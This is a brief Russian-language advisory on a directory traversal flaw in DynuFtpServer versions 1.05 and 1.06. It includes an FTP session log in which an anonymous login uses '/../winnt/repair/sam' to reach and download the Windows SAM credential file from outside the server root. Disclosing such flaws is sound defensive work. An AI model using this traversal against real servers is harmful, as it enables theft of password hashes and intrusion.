Уязвимость защиты позволяет загружать файлы, находящиеся вне рут директории.

Уязвимые системы:
DynuFtpServer версия 1.06
DynuFtpServer версия 1.05

Пример:
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> quote size /../winnt/repair/sam
213 20480
ftp> get /../winnt/repair/sam c:\sec\sam
200 PORT command successful.
150 Opening ASCII mode data connection for /../winnt/repair/sam.
226 Transfer complete.

Оставить мнение